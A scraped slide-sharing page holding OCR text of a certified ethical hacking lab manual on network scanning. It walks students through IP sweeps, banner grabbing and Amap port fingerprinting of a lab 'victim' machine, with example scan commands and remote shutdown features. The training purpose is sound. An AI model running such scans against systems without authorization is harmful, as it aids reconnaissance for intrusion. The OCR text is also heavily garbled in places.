Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Ad

Recently uploaded (19)

project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Determining Glass is mechanical textile
Determining Glass is mechanical textileDetermining Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Determining Glass is mechanical textile
Determining Glass is mechanical textileDetermining Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
Ad

Ceh v8 labs module 03 scanning networks

  • 1. CEH Lab Manual Scanning Networks Module 03
  • 2. Module 03 - Scanning Networks Scanning a Target Network Scanninga network refersto a setofproceduresforidentifyinghosts,po/ts, and servicesrunningin a network. Lab Scenario Vulnerability scanning determines the possibility of network security attacks. It evaluates the organization’s systems and network for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment. You need to conduct penetration testing and list die direats and vulnerabilities found in an organization’s network and perform port scanning, network scanning, and vulnerability scanning ro identify IP/hostname, live hosts, and vulnerabilities. Lab Objectives The objective of diis lab is to help students in conducting network scanning, analyzing die network vulnerabilities, and maintaining a secure network. You need to perform a network scan to: ■ Check live systems and open ports ■ Perform banner grabbing and OS fingerprinting ■ Identify network vulnerabilities ■ Draw network diagrams of vulnerable hosts Lab Environment 111 die lab, you need: ■ A computer running with Windows Server 2012, Windows Server 2008. Windows 8 or Windows 7 with Internet access ■ A web browser ■ Administrative privileges to run tools and perform scans Lab Duration Time: 50 Minutes Overview of Scanning Networks Building on what we learned from our information gadiering and threat modeling, we can now begin to actively query our victims for vulnerabilities diat may lead to a compromise. We have narrowed down ou1 attack surface considerably since we first began die penetration test widi everydiing potentially in scope. I C O N K E Y Valuable information s Test your knowledge H Web exercise Q Workbook review ZZ7 Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page S5
  • 3. Module 03 - Scanning Networks Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. 111 fact even a seemingly harmless misconfiguration can be the nuiiing point in a penetration test that gives up the keys to the kingdom. For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards using more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then die risk associated with the anonymous read option is minimal. On die other hand, if you are able to read the entire file system using die anonymous FTP account, or possibly even worse, someone lias mistakenly left die customer's trade secrets in die FTP directory that is readable to die anonymous user; this configuration is a critical issue. Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of diem. As we will see in diis module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment. 111 diis module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools. Lab Tasks Pick an organization diat you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Recommended labs to assist you in scanning networks: ■ Scanning System and Network Resources Using Advanced IP Scanner ■ Banner Grabbing to Determine a Remote Target System Using ID Serve ■ Fingerprint Open Ports for Running Applications Using the Amap Tool ■ Monitor TCP/IP Connections Using die CurrPorts Tool ■ Scan a Network for Vulnerabilities Using GFI LanGuard 2012 ■ Explore and Audit a Network Using Nmap ■ Scanning a Network Using die N etScan Tools Pro ■ Drawing Network Diagrams Using LANSurveyor ■ Mapping a Network Using the Friendly Pinger ■ Scanning a Network Using die N essus Tool ■ Auditing Scanning by Using Global Network Inventory ■ Anonymous Browsing Using Proxy Sw itcher TASK 1 Overview L__/ Ensure you have ready a copy of the additional readings handed out for this lab. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page S6
  • 4. Module 03 - Scanning Networks ■ Daisy Chaining Using Proxy W orkbench ■ HTTP Tunneling Using HTTPort ■ Basic Network Troubleshooting Using the M egaPing ■ Detect, Delete and Block Google Cookies Using G-Zapper ■ Scanning the Network Using the C olasoft P ack et Builder ■ Scanning Devices in a Network Using The Dude Lab Analysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posture and exposure duough public and free information. P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 87
  • 5. Module 03 - Scanning Networks Scanning System and Network Resources Using Advanced IP Scanner -AdvancedIP Scanneris afree nefirork scannerthatgivesyon varioustypes of information regardinglocalnehvork computers. Lab Scenario 111 this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities. Lab O bjectives The objective of this lab is to help students perform a local network scan and discover all the resources 011 die network. You need to: ■ Perform a system and network scan ■ Enumerate user accounts ■ Execute remote penetration ■ Gather information about local network computers Lab Environm ent 111 die lab, you need: ■ Advanced IP Scanner located at Z:CEHv8 Module 03 Scanning NetworksScanning Tools Advanced IP Scanner ■ You can also download the latest version of A dvanced IP Scanner from the link http://www.advanced-ip-scanner.com I C O N K E Y / = ‫־‬ Valuable information ✓ Test your knowledge S Web exercise CQWorkbook review l—J Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Q You can also download Advanced IP Scanner from http:/1www.advanced-ip- scanner.com. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 88
  • 6. Module 03 - Scanning Networks ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows 8 as die attacker (host machine) ■ Another computer running Windows server 2008 as die victim (virtual machine) ■ A web browser widi Internet a cc e ss ■ Double-click ipscan20.msi and follow die wizard-driven installation steps to install Advanced IP Scanner ■ Administrative privileges to run diis tool Lab Duration Time: 20 Minutes O verview of N etw ork Scanning Network scanning is performed to collect information about live system s, open ports, and network vulnerabilities. Gathered information is helpful in determining threats and vulnerabilities 111 a network and to know whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources. Lab Tasks 1. Go to Start by hovering die mouse cursor in die lower-left corner of die desktop FIGURE 1.1:Windows 8- Desktopview 2. Click Advanced IP Scanner from die Start menu in die attacker machine (Windows 8). / 7Advanced IP Scanner works on Windows Server 2003/ Server 2008 and on Windows 7 (32 bit, 64 bit). S TASK 1 Launching Advanced IP Scanner Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 89
  • 7. Module 03 - Scanning Networks Start Admin ^ Nc m WinRAR Mozilla Firefox Command Prompt i t t Fngago Packet builder 2* Sports Computer tS Microsoft Clip Organizer Advanced IP Scanner m iiilili finance Control Panel Microsoft Office 2010 Upload... • FIGURE 12. Windows 8- Apps 3. The Advanced IP Scanner main window appears. FIGURE 13: TheAdvancedIP Scannermainwindow 4. Now launch die Windows Server 2008 virtual machine (victim’s machine). Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited m With Advanced IP Scanner, you can scan hundreds of IP addresses simultaneously. You can wake any machine remotelywith Advanced IP Scanner, if the Wake-on‫־‬LAN feature is supported byyour network card. C E H Lab M anual Page 90
  • 8. Module 03 - Scanning Networks O jf f lc k 10:09 FM Jiik FIGURE 1.4:ThevictimmachineWindows server2008 5. Now, switch back to die attacker machine (Windows 8) and enter an IP address range in die Select range field. 6. Click die Scan button to start die scan. 7. Advanced IP Scanner scans all die IP addresses within die range and displays the scan results after completion. L__/ You have to guess a range of IP address of victim machine. aRadmin 2.x and 3.x Integration enable you to connect (ifRadmin is installed) to remote computers with just one dick. The status of scan is shown at the bottom left side of the window. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 91
  • 9. Module 03 - Scanning Networks Advanced IP Scanner File Actions Settings View Heip J►S car' J l IP cr=£k=3 r f t o d id 3 ? f i l : Like us on ■ 1 Facebook 10.0.0.1-10.0.0.10 M A C addressManufacturer Resits | Favorites | rStatus 0 w 10.0.0.1 10.0.a1 Nlctgear, Inc. 00:09:5B:AE:24CC >£*‫ט‬ W IN-MSSELCK4K41 10.0.a2 Dell Inc D0:67:ES:1A:16:36 ® & WINDOWS# 10.0.03 M icro so ft Corporation 00:15:5D:A8:6E:C6 W IN*LXQ N3W R3R9M 10.0.05 M icrosoft Corporation 00:15:5D:A8:&E:03 ® 15 W IN-D39MR5H19E4 10.0.07 Dell Inc D1:3‫׳‬E:D9:C3:CE:2D 5*iv*, 0d« J0, Sunknown FIGURE 1.6:TheAdvancedIP Scannermainwindowafter scanning 8. You can see in die above figure diat Advanced IP Scanner lias detected die victimmachine’s IP address and displays die status as alive 9. Right-click any of die detected IP addresses. It will list Wake-On-LAN. Shut down, and Abort Shut down Advanced IP Scanner‫־‬5 Fie Actions Settings View Helo Like us on FacebookWi*sS:ip c u u *IIScan 10.0.0.1-10.0.0.10 Resuts Favorites | MAC addresstorufa ctu re r nN am eStatus 0G:09:5B:AE:24CC D0t67:E5j1A:16«36 00:15:‫צ‬U:A8:ofc:Ot> 00:15:SD:A8:6E:03 CW:BE:D9:C3:CE:2D Netgear. Inc Microsoft Corporation M icro so ft C orporation Dell Inc 10.0.011 !Add to ‘Favorites' Rescan selected Sive selected... W dke‫־‬O n ‫־‬LA N Shut dcwn... A bort sh u t d cw n R adrnir 10.0.0.1 IHLMItHMM, — W INDO W S8 t*p‫׳‬ore W IN-LXQN3W R3 C o p y W IN‫־‬ D39MR5HL< h i 5 alive. 0 dead, 5 unknow n FIGURE 1.7:TheAdvancedIP Scanner mainwindowwithAlive Host list 10. The list displays properties of the detected computer, such as IP address. Name, MAC, and NetBIOS information. 11. You can forcefully Shutdown, Reboot, and Abort Shutdown die selected victim machine/IP address Lists of computers saving and loading enable you to perform operations with a specific list of computers.Just save a list of machines you need and Advanced IP Scanner loads it at startup automatically. m Group Operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few dicks. M T A S K 2 Extract Victim’s IPAddress Info aWake-on-LAN: You can wake any machine remotely with Advanced IP Scanner, if Wake-on-LAN feature is supported by your network card. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 92
  • 10. Module 03 - Scanning Networks ‫״‬m s i * Like us on Facebookw 3 MAC addressjrer 00;C9;5B:AE:24;CC D0:67:E5:1A:16:36 Ition 00:15:3C:A0:6C:06 Ition 00:I5:5D:A8:6E:03 D4:BE D$:C3:CE:2D Shutdown options r Use V/jndo'AS autheritifcation Jser narre: Dcss*rord: rneoct (sec): [60 Message: I” Forcedshjtdown f " Reooot & File Actions Settings View Help Scan J ! ] .■ ] 110.0.0.1-100.0.10 Results | Favorites | Status Name ® a 100.0.1 WIN-MSSELCK4K41 WIND0WS8 $ WIN-LXQN3WR3R9M » a WIN-D39MR5HL9E4 S0Jrc, Odcad, 5 unknown Winfingerprint Input Options: ■ IP Range (Netmask and Inverted Netmask supported) IP ListSmgle Host Neighborhood FIGURE 1.8:TheAdvanced IP ScannerComputer propertieswindow 12. Now you have die IP address. Name, and other details of die victim machine. 13. You can also try Angry IP scanner located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksPing Sw eep ToolsAngry IP Scanner It also scans the network for machines and ports. Lab Analysis Document all die IP addresses, open ports and dieii running applications, and protocols discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Advanced IP Scanner Scan Information: ■ IP address ■ System name ■ MAC address ■ NetBIOS information ■ Manufacturer ■ System status Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 93
  • 11. Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine and evaluate the IP addresses and range of IP addresses. Internet Connection Required es□ Y Platform Supported 0 Classroom 0 No 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 94
  • 12. Module 03 - Scanning Networks BannerGrabbing to Determine a Remote Target System using ID Serve IDS Serveis usedto identify the make, model, and versionof any website'sserver sofhrare. Lab Scenario 111die previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflow, integer flow, SQL injection, and web application 011 a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them and crack into die network and cause server damage. Therefore, it is extremely important for penetration testers to be familiar widi banner grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine die role of servers within a network. 111 diis lab, you will learn die banner grabbing technique to determine a remote target system using ID Serve. Lab Objectives The objective of diis lab is to help students learn to banner grabbing die website and discover applications running 011 diis website. 111 diis lab you will learn to: ■ Identify die domain IP address ■ Identify die domain information Lab Environment To perform die lab you need: ■ ID Server is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsID Serve ICON KEY Valuable information y* Test your knowledge Web exercise O Workbook review O Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 95
  • 13. Module 03 - Scanning Networks ■ You can also download the latest version of ID Serve from the link http:/ / www.grc.com/id/idserve.htm ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ Double-click idserve to run ID Serve ■ Administrative privileges to run die ID Serve tool ■ Run this tool on Windows Server 2012 Lab Duration Time: 5 Minutes Overview of ID Serve ID Serve can connect to any server port on any domain or IP address, then pull and display die server's greeting message, if any, often identifying die server's make, model, and version, whether it's for FTP, SMTP, POP, NEW’S, or anything else. Lab Tasks 1. Double-click idserve located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsID Serve 2. 111die main window of ID Serve show in die following figure, select die Sever Query tab TASK 1 Identify w ebsite server information ' - r oID Serve0 Internet Server Identification Utility, v l .02 Personal Security Freeware by Steve Gibson Copyright(c) 2003 byGibsonResearchCap. ID Serve Background Server Query | Q&A/Help Enter 01 copy / pasteanInternet server URL 0*IP address here(example wwwrmcrosoft com) ri When an Internet URL or IPhas been providedabove ^ press thisbutton to rwtiateaqueryof the speahed server Query TheServerr! Server The server identified<se* as ^4 E*itgoto ID Serve webpageCopy If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP FIGURE 21: MainwindowofID Serve 3. Enter die IP address or URL address in Enter or Copy/paste an Internal server URL or IP address here: Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 96
  • 14. Module 03 - Scanning Networks ID Server© Internet Server Identification Utility, v l .02 Personal Security Freeware by Steve Gibson Copyright(c) 2003 byGibsonResearchCorp. ID Serve Background Server Query I Q & A /tjelp Enter or copy I pasteanInternet serve* URL or IPaddress here(example wwwrmcrosoft com) ^ |www certifie d h a cke r com[ When an Internet URL 0*IPhasbeen providedabove, press thisbutton 10 initiateaquery01 the specfod serverQuery TheServer Server query processing (% The server identifiedilsef as EjjitGotoID Serveweb pageCopy ID Serve can accept the URL or IP as a command-line parameter FIGURE 22 Enteringdie URLfor query 4. Click Query The Server; it shows server query processed information ’ - r ° ] - ‫׳‬ID Serve Exit Internet Server Identification Utility, v l .02 Personal Security Freeware by Steve Gibson Copyright (c) 2003 byGibsonResearchCofp ID Serve Background Server Query | Q&A/Help Enter or copy / pasteanInternet server URL or IPaddress here(example www m»crosott com) |w w w . c e rtifie d h a c ke r.c o m |<T When an Internet URL 0* IPhasbeen providedabove, pressthisbutton toinitiateaqueryof thespeeded serverQuery The Server r2 [ Server query processing Initiating server query Looking up IP address for domain www certifiedhacker com The IP address for the domain is 202.75 54 101 Connecting to the server on standard HTTP port: 80 Connected] Requesting the server's default page The server identfied itself as M ic r o soft-11 S/6.0a Goto ID Serveweb pageCopy Q ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information. FIGURE 23: Serverprocessedinformation Lab Analysis Document all the IP addresses, their running applications, and die protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 97
  • 15. Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved IP address: 202.75.54.101 Server Connection: Standard H T1P port: 80 Response headers returned from server: ID Serve ■ H T T P /1.1 200 ■ Server: Microsoft-IIS/6.0 ■ X-Powered-By: PHP/4.4.8 ■ Transfer-Encoding: chunked ■ Content-Type: text/html P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine what protocols ID Serve apprehends. 2. Check if ID Serve supports https (SSL) connections. Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 98
  • 16. Module 03 - Scanning Networks Fingerprinting Open Ports Using the Amap Tool .-bnap determinesapplications running on each openport. Lab Scenario Computers communicate with each other by knowing die IP address in use and ports check which program to use when data is received. A complete data transfer always contains the IP address plus the port number required. 111 the previous lab we found out that die server connection is using a Standard HTTP port 80. If an attacker finds diis information, he or she will be able to use die open ports for attacking die machine. 111this lab, you will learn to use the Amap tool to perform port scanning and know exacdy what applications are running on each port found open. Lab Objectives The objective of diis lab is to help students learn to fingerprint open ports and discover applications 11inning on diese open ports. hi diis lab, you will learn to: ■ Identify die application protocols running on open ports 80 ■ Detect application protocols Lab Environment To perform die lab you need: ■ Amap is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsVAMAP ■ You can also download the latest version of AMAP from the link http: / / www.thc.org dic-amap. ■ If you decide to download the latest version, then screenshots shown in the lab might differ ICON KEY 2 ^Valuable information Test vour knowledge g Web exercise Q Workbook review C 5 Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 99
  • 17. Module 03 - Scanning Networks ■ A computer running Web Services enabled for port 80 ■ Administrative privileges to run die Amap tool ■ Run diis tool on Windows Server 2012 Lab Duration Time: 5 Minutes Overview of Fingerprinting Fingerprinting is used to discover die applications running on each open port found 0x1 die network. Fingerprinting is achieved by sending trigger packets and looking up die responses in a list of response strings. Lab Tasks 1. Open die command prompt and navigate to die Amap directory. 111diis lab die Amap directory is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksBanner Grabbing ToolsAMAP 2. Type amap www.certifiedhacker.com 80, and press Enter. Administrator: Command Prompt33 [D :CEH~ToolsCEH u8 M odule 03 S c a n n i n g N e t w o r k B a n n e r G r a b b in g T oolsA M A P>anap uw [ w . c o r t i f i o d h a c h e r . c o m 80 Anap v 5 . 2 <w w w . t b c . o r g / t h c - a m a p > s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 4 2 - MAPPING n ode J n i d e n t i f i e d p o r t s : 2 0 2 . ? 5 . 5 4 . 1 0 1 : 8 0 / t c p < t o t a l 1 > . *map v 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 5 3 D :C E H -T oolsC E H v8 M odule 0 3 S c a n n i n g N e t w o r k B a n n e r G r a b b in g ToolsAMAP> FIGURE 3.1:Amapwithhostname www.ce1tifiedl1acke1.comwith Port SO 3. You can see die specific application protocols running 011 die entered host name and die port 80. 4. Use die IP address to check die applications running on a particular port. 5. 111die command prompt, type die IP address of your local Windows Server 2008(virtual machine) amap 10.0.0.4 75-81 (local Windows Server 2008) and press Enter (die IP address will be different in your network). 6. Try scanning different websites using different ranges of switches like amap www.certifiedhacker.com 1-200 a t TAS K 1 Identify Application Protocols Running on Port 80 Syntax: amap [-A| ‫־‬ B|-P |-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [‫־‬i <£ile>] [target port [port]...] ✓ For Amap options, type amap -help. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 100
